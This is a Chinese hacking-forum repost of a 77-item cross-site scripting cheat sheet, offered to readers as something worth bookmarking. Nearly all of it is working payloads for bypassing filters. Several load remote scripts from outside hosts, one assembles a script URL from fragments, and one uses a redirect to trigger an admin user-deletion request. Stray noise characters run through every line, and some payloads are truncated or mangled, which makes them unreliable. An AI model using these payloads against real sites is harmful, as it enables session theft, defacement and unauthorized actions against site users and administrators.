貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。, Z {) J/ u- Q% a% F8 @8 B
(1)普通的XSS JavaScript注入$ {( y z$ i$ P5 N9 M
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
D& W% {+ P. H(2)IMG标签XSS使用JavaScript命令! E6 d, p! X& ~
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>+ ~) V5 Z; G/ _! q. D H% E, M: \' `
(3)IMG标签无分号无引号
; W5 L, v6 M( A<IMG SRC=javascript:alert(‘XSS’)>
9 K: ]9 j0 I2 ^(4)IMG标签大小写不敏感
% K- |% q5 I7 u<IMG SRC=JaVaScRiPt:alert(‘XSS’)>2 R; P% L6 l8 q* z
(5)HTML编码(必须有分号)
7 \6 e6 L( U; i- O2 S: t$ V$ |, M<IMG SRC=javascript:alert(“XSS”)>
* {% k q. e: t; m6 i$ n7 [(6)修正缺陷IMG标签
, A" T$ ~, S G6 P8 ^<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
0 N- k; g. v( }5 G0 a& C
7 {* x4 u" `# `4 v
Q0 d3 k, t8 |7 S! f(7)formCharCode标签(计算器)0 j6 R' t3 Q! b. j
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>/ o. Y% _7 }; t$ M5 T
(8)UTF-8的Unicode编码(计算器)
2 S) n) u0 a5 @# n* r& G1 o) i& X2 [<IMG SRC=jav..省略..S')>% p$ B+ w8 N3 O
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)6 R$ g$ I" c( e- m
<IMG SRC=jav..省略..S')># r% J6 h. A( }( w! Q
(10)十六进制编码也是没有分号(计算器), V+ T$ k' i; l
<IMG SRC=java..省略..XSS')>
2 b* @8 k/ G& `) Z5 I" d2 r. X; b(11)嵌入式标签,将Javascript分开2 T5 m" ]2 s- }8 }% P* j- t
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- L3 M! ~5 P a(12)嵌入式编码标签,将Javascript分开) G$ t% W# [$ y* u( r! w; A2 P5 y i4 Y
<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 v: X2 g) Z/ r(13)嵌入式换行符3 D* q4 v% g# {$ E# s
<IMG SRC=”jav ascript:alert(‘XSS’);”>
* N7 u- e) @. r$ N5 L: l5 g s2 V(14)嵌入式回车
, a% N. h! S' d8 f<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 a; j. s4 g5 @6 Z(15)嵌入式多行注入JavaScript,这是XSS极端的例子2 f% c5 n2 G: ?4 t% N5 d3 L' \
<IMG SRC=”javascript:alert(‘XSS‘)”>
( F# a* m5 B9 v. V( O" a7 p0 m(16)解决限制字符(要求同页面)+ w. I% q! Y9 k, g0 n
<script>z=’document.’</script>
& \ k( R5 B2 I5 X, X0 C: |0 n) @7 F<script>z=z+’write(“‘</script>
& e/ j- d9 G7 T' ?<script>z=z+’<script’</script>& x8 b4 J/ h9 y1 g& _
<script>z=z+’ src=ht’</script>" l* q6 y$ H4 N" t0 n. s Q
<script>z=z+’tp://ww’</script>) P8 q3 |4 H: j" {, I
<script>z=z+’w.shell’</script>- Q }" h: n% {- C% z
<script>z=z+’.net/1.’</script>9 N) e, i5 _% c
<script>z=z+’js></sc’</script>
0 M( T9 M- H0 p9 O! P# @<script>z=z+’ript>”)’</script>( s7 E& s3 h: H; ?, D0 o4 v- R. D
<script>eval_r(z)</script>
% t" d# x+ w& G(17)空字符12-7-1 T00LS - Powered by Discuz! Board
) v. m0 q! \7 xhttps://www.t00ls.net/viewthread ... table&tid=15267 2/61 \+ m m$ F8 H" B
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out4 Q! `* r ]. e' V, A/ b
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用4 d% L2 O. Z2 f/ S+ R
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out# L7 T6 ~; ~+ E* I0 R( u f
(19)Spaces和meta前的IMG标签
/ T- e+ ?+ y4 Y/ P- M<IMG SRC=” javascript:alert(‘XSS’);”>
8 i. `$ O. I# I7 B4 V(20)Non-alpha-non-digit XSS1 t$ ?1 k9 c" S/ [2 @
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>; }, {3 o @7 Q# B$ j& u
(21)Non-alpha-non-digit XSS to 2' \. V s: ` F# n# K
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>5 \$ J! ^5 D( z4 v4 o- c
(22)Non-alpha-non-digit XSS to 3) }5 A8 }6 A2 S" o* A
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
. `: M, w# W/ H# w3 \2 X, L4 E(23)双开括号
$ M( H* C5 [- I' p<<SCRIPT>alert(“XSS”);//<</SCRIPT>
0 \9 { W6 C: c; x8 ^" V(24)无结束脚本标记(仅火狐等浏览器)
0 e% q: y( }) K7 V, o) `1 [- _: k<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>$ F$ y9 ]) V! f5 u6 S. c
(25)无结束脚本标记2
' e& E5 t- N# F2 l* X- g, @<SCRIPT SRC=//3w.org/XSS/xss.js>
. p8 ~% _+ z. g" j, S(26)半开的HTML/JavaScript XSS* z; N6 K- S/ ]* S
<IMG SRC=”javascript:alert(‘XSS’)”- l' K% j+ h7 S6 h( W, r$ W9 T
(27)双开角括号
5 U7 a! |$ r4 B% V8 b3 D<iframe src=http://3w.org/XSS.html <4 o( o6 J: U8 l$ Q) F' P
(28)无单引号 双引号 分号
1 q: q: Z9 F" z- j9 s: ^<SCRIPT>a=/XSS/
[$ l3 z* K2 e" lalert(a.source)</SCRIPT>
& k- M0 v3 ^2 y% l# a(29)换码过滤的JavaScript( B. H8 v/ E% p8 @8 v8 h! v1 y
\”;alert(‘XSS’);//
0 g8 b5 y4 J3 J& U* I3 K(30)结束Title标签- Y0 s0 u* [6 i8 t4 v F1 {1 _. _8 s
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
1 z( x5 _5 l: A( N: ]1 H(31)Input Image
D O" m0 n0 w/ E% L' g6 ^<INPUT SRC=”javascript:alert(‘XSS’);”>3 i% m2 `$ m. V. o
(32)BODY Image* k" M% P A, T. w& @4 N
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>+ f/ z6 K, r( C1 M
(33)BODY标签8 g* S) z* M+ F$ V8 h) J- D
<BODY(‘XSS’)>
. n6 e" E0 e: ]% k9 R(34)IMG Dynsrc7 m+ V: J0 w+ g( K, L. H; ?. `- d
<IMG DYNSRC=”javascript:alert(‘XSS’)”>: X: N' B4 ~- ]$ T0 Z& a
(35)IMG Lowsrc
1 }! c9 M2 K! i) E7 L<IMG LOWSRC=”javascript:alert(‘XSS’)”>
6 T5 T1 @2 J2 _* E+ |% {/ t(36)BGSOUND
. H3 |% x. p- T9 Z# A8 w( i5 o<BGSOUND SRC=”javascript:alert(‘XSS’);”>0 b. \3 P: n7 J. P+ |
(37)STYLE sheet0 J+ y, G: c$ C
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>' y* k/ e1 v M2 k8 K1 @
(38)远程样式表
1 a9 d7 f3 o S% c4 n: W* c( S3 n<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>% s9 h6 o7 b. C! [: f
(39)List-style-image(列表式)
1 z9 h6 o: }5 k0 P5 ^<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS7 h- N7 ?# d4 I4 X
(40)IMG VBscript: V3 v Y3 r: R
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
* {& ?6 |# {# B7 W+ |) P9 e(41)META链接url; v. l! b/ a* Q2 {9 ~+ I
; a4 }8 j. s$ C& z- F& g; Y' r
8 z. g: _5 ^# i& ]7 K* q<META HTTP-EQUIV=”refresh” CONTENT=”0;: h, e8 s U5 D5 W/ L
URL=http://;URL=javascript:alert(‘XSS’);”>
/ m+ F% @ k" W" B2 `(42)Iframe7 }6 y5 U2 [& v5 }* I1 R6 s
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>6 b1 n6 e: X6 }8 f
(43)Frame; U' |8 Z& ^" [2 d" @; @
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board1 m- n3 c0 K& H9 p, W
https://www.t00ls.net/viewthread ... table&tid=15267 3/6, ` D P* D. i9 l
(44)Table1 o- @: `8 a8 ^) w0 w, v. A- m1 p) m
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>/ W ?; I" {+ q( z4 _! U0 t
(45)TD
, C8 v0 g3 O, \, }<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
8 B/ t- l7 V' h9 \, K(46)DIV background-image
7 @$ e* b/ I5 @5 B6 j<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>( u: M7 k0 Q, c) [% U
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
4 h5 }4 D, [+ d3 l9 b2 @) m- D8&13&12288&65279)8 b) h& ^7 g& V R
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! B3 P/ U" x8 t$ U# o/ Y
(48)DIV expression
/ x! t+ r; Q8 D4 K<DIV STYLE=”width: expression_r(alert(‘XSS’));”>& e% Y% E7 e# `1 x( ?3 c4 E
(49)STYLE属性分拆表达% q9 o5 |5 ^& l2 K$ T! c0 p
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>* b1 B" ^9 t. ?; a4 b3 K4 ~
(50)匿名STYLE(组成:开角号和一个字母开头)) Z: ^& {' |7 ?* g$ O
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>0 w9 \; N; ]! }) c8 ]8 f, u
(51)STYLE background-image; A& H# l- \& u
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
9 Q" M0 c" x/ v2 F2 l1 M4 zCLASS=XSS></A>% Z2 v! O# M! r! \/ m4 d6 i# D1 n0 d* o
(52)IMG STYLE方式7 C- H4 v- n$ s; q. }; C$ @
exppression(alert(“XSS”))’>) I$ o8 ]( e2 j1 J* }
(53)STYLE background
0 w' d7 a3 ~' ^$ S0 ?7 r0 E<STYLE><STYLE5 m: g- Q Z8 I# X: D
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>' I6 e# @ M" c; e8 r; z
(54)BASE* {! ^4 d- ]+ ^: Q g
<BASE HREF=”javascript:alert(‘XSS’);//”>
" |) D8 U; [& O% c* x$ f1 D(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS9 Z7 t$ F5 P/ E9 C f7 S
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
0 f, ^9 ?: k& Z(56)在flash中使用ActionScrpt可以混进你XSS的代码) ^% P3 N0 N, O" g) Y* \
a=”get”; V: Z( N4 g& ~
b=”URL(\”";% @" j9 r" T9 Y. V* G; P
c=”javascript:”;
) n) r% V3 ~5 J, E! G: dd=”alert(‘XSS’);\”)”;
' C% R: R! v% p# jeval_r(a+b+c+d);
, L; N6 d' l& Y( c7 d7 h, E(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上; ]% H. Y( p# r" Q
<HTML xmlns:xss>
; O+ m+ K& E5 _ z4 Y<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
2 J$ o5 F' i0 P! k<xss:xss>XSS</xss:xss>0 T; H5 E8 j/ b% ^: i5 R
</HTML>
* B5 m7 C- Q( r, \5 C(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
0 X5 K3 r- p% `% I- j<SCRIPT SRC=””></SCRIPT>
3 G1 S* R$ M' s9 N0 Z) ?(59)IMG嵌入式命令,可执行任意命令+ G5 C; Z) K. x$ c
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
7 H; I2 \2 ]' a7 \$ Z5 {(60)IMG嵌入式命令(a.jpg在同服务器)
6 \* J* D' q1 q- IRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
, v9 I: Q7 n& C1 u; r% ]8 Y- {(61)绕符号过滤
6 f" z% h- o" ^6 E1 Q<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
# O) { I5 u* m9 j" I(62)4 A0 W+ _) G! O
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
. o0 n8 }4 n6 D* x8 m(63)
( |& V9 n" O2 _- F: W6 u: H<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
1 _' q7 J2 l$ P1 X, ](64): @3 w9 H' H4 u, V a
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>0 o4 A$ @- u) K4 ~, d) K
(65) O1 W) O* Q9 f. b2 j4 q$ @
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
5 i% |6 Y& O' g4 G! E( i3 Z(66)12-7-1 T00LS - Powered by Discuz! Board
1 n5 s; a( d, uhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6" M. ~$ O m: ^" Z
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
! K9 v; h) m/ W(67)) ~; m( s& ~/ D; }- V
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
, k( v$ t; A: q% i* ^6 q</SCRIPT>
% v" W" ^( V% ?' M/ c% Q(68)URL绕行% P* s' b7 S. X- Q. {. U; P
<A HREF=”http://127.0.0.1/”>XSS</A>
5 k) S7 p3 }# d; u' F, V3 N(69)URL编码
( P6 t. |4 V- S% j. _0 }<A HREF=”http://3w.org”>XSS</A>
& ~5 H8 h z5 r(70)IP十进制
: e, J9 i+ a/ [) g: Z- ^<A HREF=”http://3232235521″>XSS</A>$ y; \) a4 B+ _# N
(71)IP十六进制
+ X5 u# S8 J" r3 U<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
. e8 \4 R4 J' [; K+ D(72)IP八进制
[! e7 Q3 J% ?; ~! Q! K; P<A HREF=”http://0300.0250.0000.0001″>XSS</A>
5 v* D$ i5 W8 ?8 f9 h6 d(73)混合编码8 I5 R* S& Z+ Y; P% R3 X. f6 `
<A HREF=”h% v0 W. g& |& q, l
tt p://6 6.000146.0×7.147/”">XSS</A>, j& ]6 ?3 }' m& J& h$ l
(74)节省[http:] G+ d: ~/ h C7 I* b/ u+ m
<A HREF=”//www.google.com/”>XSS</A>" h6 _' E+ z, I
(75)节省[www]
0 P- O/ C' a- J<A HREF=”http://google.com/”>XSS</A>
! w- g7 y% T6 {# @* q% [. l(76)绝对点绝对DNS$ |5 v/ L( h e: [3 ~, c- P
<A HREF=”http://www.google.com./”>XSS</A>
9 @ ~$ @( G/ A7 o* u$ F; A% V(77)javascript链接
. i5 E% I; Y: J9 X<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
# I2 V0 ?4 G6 U0 s* g0 L* H( W6 n. Z( |/ a2 s z* U3 V2 N
原文地址:http://fuzzexp.org/u/0day/?p=14
6 K X5 \7 Q, W/ X8 }# M. D# a) p' Y, g' p& B* b* g% n
|
发表于 2013-4-19 19:22:37
收藏
支持
反对